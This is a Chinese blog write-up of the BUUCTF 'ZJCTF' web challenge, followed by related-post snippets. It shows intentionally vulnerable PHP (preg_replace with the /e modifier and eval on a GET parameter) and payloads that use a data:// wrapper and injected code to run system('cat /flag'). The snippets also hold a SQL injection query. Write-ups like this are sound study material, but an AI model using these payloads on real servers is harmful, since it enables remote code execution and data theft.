buuctf题目ZJCTF

最新推荐文章于 2025-06-01 00:47:10 发布
最新推荐文章于 2025-06-01 00:47:10 发布
阅读量194 收藏 2
点赞数 10
分类专栏: web刷题WP 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_65853019/article/details/141935364
版权

页面展示:

从URL中获取两个参数分别赋给text和file,判断test中的内容与后面的字符串是否强相等,其中file_get_contents($text,'r')表示读文件text的内容,而我们需要将输入的text使用伪协议data://text/plain伪装成文本数据,则可以构造payload,/?text=data://text/plain,I have a dream&file=next.php,出现了base64编码,解码后得到下列php代码:

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
        @eval($_GET['cmd']);
}

其中complex函数对字符串进行正则替换,即将匹配到的字符串改为小写。/ei当作php代码来执行,忽略大小写,getFlag函数将cmd中的参数输出。

构造payload,/?text=data://text/plain,I have a dream&file=next.php&\S*=${getFlag()}&cmd=system('cat /flag');使用正则表达式匹配一个或多个非空白字符(\S*),然后赋值给一个变量。得到flag。

BUUCTF-Web题解(持续更新中)
2301_80281749的博客
11-25 2293
查询字段1’ union select 1,2,group_concat(id,username,password) from l0ve1ysq1#,就得到了flag:flag{5366f7aa-8040-44fc-bd88-bd0cfc671f3d}cat /flag进行查看flag文件,于是得到flag:flag{d81837e0-b908-4a0a-bac0-23ff569befe1}1,于是就得到了flag:flag{fac64f95-3877-4f3e-9772-47bb8585b31a}
Buuctf Web题解
weixin_68029979的博客
04-24 2000
写在前面, 本人小白一枚,记录一下web做题过程,大部分为个人理解可能有些地方写的不够明确还请见谅。当然由于刚入手web题,所以有些题会没有思路,这时会参考其他大佬的题解过程。本文会一直更新,由于是第一次写博客,所以并不知道一篇能写多少,不管怎样会一直更新的。在题解中,可能并没有说清除为什么是这样,什么要这样,其实大部分我也不知道是为什么,但就是这样做,由上所说我是个小白。如果在文中,出现了只有题目没有题解的情况,是因为我还没有学习与之相关的知识,所以先跳过了,但总会写的。
BUUCTF- ZJCTF,不过如此题目解析
2201_75327657的博客
03-29 426
发现有preg——replace说明有代码执行问题。源码中的\\1实际等于\1本身的\1有其他意思。打开查看源码查看有file说明是伪协议。preg——replace相关链接(得到base64编码解析出来为。那就利用filter查看。
web | CTF】BUUCTF [ZJCTF 2019]NiZhuanSiWei
weixin_46301214的博客
09-30 306
利用:是php中独有的一个协议,可以作为一个中间过滤器来处理目标数据流,可以进行任意文件的读取,且该协议的参数会在该协议路径上进行传递,多个参数都可以在一个路径上传递,相当于可构造多个过滤器。通俗一点讲就是,php://input作为被包含的参数时,也是文件包含,不过是包含的对象是post的数据,而post的数据为用户所传入,所以也相当于任意命令执行。直接 file=flag.php ,然后echo一下实例化的类,就完事了(忘记了上去看一下一开始的源码)有不一样的效果,有的是在注释,有的是直接显示到页面。
BUUCTF [ZJCTF 2019]NiZhuanSiWei1
biggerpig的博客
09-25 1065
BUUCTF web类型题目[ZJCTF 2019]NiZhuanSiWei1详解
BUUCTF WEB ZJCTF,不过如此1
qq_41696858的博客
12-11 649
上来就给源码,很直接 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"; i
BUUCTF[ZJCTF 2019]NiZhuanSiWei
weixin_45253622的博客
05-16 279
打开题目发现是代码审计,源码如下: <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ //text不为空,且file_get_contents读取的返回值为‘welcome to the zjctf
BUUCTF-ZJCTF,不过如此
m0_47571887的博客
11-29 2552
打开题目,代码审计的题,审计一下代码,我们提交text函数,并且打开后的内容要与I have a dream一致,才能执行file函数 看到有一个next.php,自然想到用php伪协议读取他 payload:index.php?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php 解码审计一下 <?php $id = $_GET['id'..
buuctf [ZJCTF 2019]NiZhuanSiWei
SopRomeo的博客
03-15 1294
给了一段源码,注释如下 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ //判断$text变量是否...
BUUCTF_ZJCTF2019_NiZhuanSiWei
qq_45628145的博客
05-03 681
NiZhuanSiWei 进入题目,直接给出了php源码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ ...
BUUCTF [ZJCTF 2019]Login
2401_85052854的博客
03-22 438
通过往前逆向观察汇编,发现被赋值成了var_130依然覆盖不了,继续跟进我们可以看到rdi最终赋值成了rax,跟进最近的一个函数:password_checker,查看rax被赋值成什么。理论上我们直接覆盖var_68成后门函数就可以拿到shell了,可是var_68在s上面,覆盖不到,那我们只能继续观察var_68中被rdi赋值的内容在哪里了。最终发现了rax最终被赋值成了在var_18的位置,终于找到了一个我们可以覆盖的一个位置了,我们只需要将var_18覆盖成后门函数就可以获得shell。
BUUCTF [BJDCTF2020]ZJCTF,不过如此
Chu_Jian_Xiong的博客
09-29 704
[BJDCTF2020]ZJCTF,不过如此考点PHP伪协议preg_replace远程代码执行实操 考点 PHP伪协议 https://www.cnblogs.com/wjrblogs/p/12285202.html preg_replace远程代码执行 https://zhuanlan.zhihu.com/p/47353283 实操 打开题目 乍一看,显然是一个PHP伪协议的题目,要求"I have a dream",以及提示包含next.php PD9waHAKJGlkID0gJF9HRVRb
[BUUCTF]-PWN:[ZJCTF 2019]EasyHeap解析
2301_79326813的博客
01-12 865
这是buu上的一道堆题,话不多说直接看保护和ida这里有一个要注意的点,那就是它是partial RELRO,Full RELRO开启说明got表不可写,而这里没有,这是我们解题的一个前提。然后看ida。这里不过多解释,主要还是创建堆块,释放堆块,edit堆块,但是没有打印堆块内容的函数。还有一个要注意的点,那就是他有system函数,并且参数似乎可以利用。虽然在我解题的过程中这个函数压根得不到flag,但我还是想从这一角度讲解一下解题思路,所以我分两个角度来讲。
NiZhuanSiWei-[ZJCTF 2019]-[PHP伪协议]-[传送门->BUUCTF]
qwsn
11-24 1709
0x01、Web 1.NiZhuanSiWei-[ZJCTF 2019]-[PHP伪协议]-[传送门->BUUCTF] 第一步:打开环境,点击题目链接,进行代码审计 <?php $text = $_GET["text"]; //GET传参:text $file = $_GET["file"]; //GET传参:file $password = $_GET["password"]; //GET传参:password if(isset($text)&&(file_get_
【网络安全】——Modbus协议详解:工业通信的“通用语言”
lingxw的博客
05-28 1212
本文系统介绍了Modbus工业通信协议的技术要点。从发展历史(1979年由Modicon公司推出)到核心特性(主从模式、四类存储区),详细解析了协议族分类(RTU/ASCII/TCP/Secure)及版本演进。重点剖析了RTU/TCP报文结构,并通过典型示例说明通信机制(功能码、时序流程)。文章还提供了开发工具推荐(ModbusPoll、libmodbus等)和学习路径。作为工业通信领域的事实标准,Modbus凭借其简单可靠的特性在工业4.0时代仍保持活力,并持续演进新形态(如Modbus over TSN
网络安全之XSS漏洞
anquan2233的博客
05-28 1059
然而,XSS 漏洞可以突破这一保护,攻击者可以通过注入恶意脚本来窃取用户的 Cookie,劫持用户的 Web 行为,甚至结合 CSRF(跨站请求伪造)进行针对性的攻击,进一步导致用户信息泄露或账户劫持等严重安全问题。与反射型和存储型 XSS 漏洞不同,基于 DOM 的 XSS 漏洞不需要用户数据出现在服务器的响应中,而是发生在客户端的 JavaScript 代码中。,简称 XSS),当应用程序将用户提交的数据发送到浏览器的页面中,但未经过适当的验证或转义时,就会引发跨站脚本(XSS)漏洞。
2025年北京市职工职业技能大赛第六届信息通信行业网络安全技能大赛复赛CTF部分WP-哥斯拉流量分析
深耕网络安全领域,聚焦护网行动(HW)、渗透测试、等级保护(等保)、CTF 竞赛四大核心方向,提供技术干货、实战经验与行业洞察。
05-28 1211
题目没有任何提示,附件gzl.pcap解题哥斯拉流量300多KB包很多,没啥经验只能挨个看回来之后又狠狠得撸了一把哥斯拉流量分析我这里用的是哥斯拉4.0.1测试链接这里发了两个包,我们进行分析。
黄河流域网络安全技能挑战赛2025
最新发布
Niuma1122的博客
06-01 914
一个比赛
网络安全方向在校生有哪些证书适合考取?
ailx10
05-27 715
网络安全领域,证书并非核心竞争力。作者花费1.1万考取CISSP证书后,发现高薪职位还需OSCP等更多认证。同事通过OSCP获得安全总监职位,而自己仍在基础岗位。2024年行业寒冬导致企业裁员、降薪,证书培训价格大幅下跌。最终感悟:实力远胜证书,花钱就能拿到的认证已丧失价值。行业变化证明,真正的能力才是立足之本。
buuctf题目维护
12-28
### 关于BUUCTF题目的维护方法与资源 对于BUUCTF这类平台上的题目,其维护主要涉及几个方面:更新现有挑战、修复漏洞以及提供详尽的学习资料和支持。为了确保这些目标得以实现,通常会采取一系列措施。 #### 更新...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值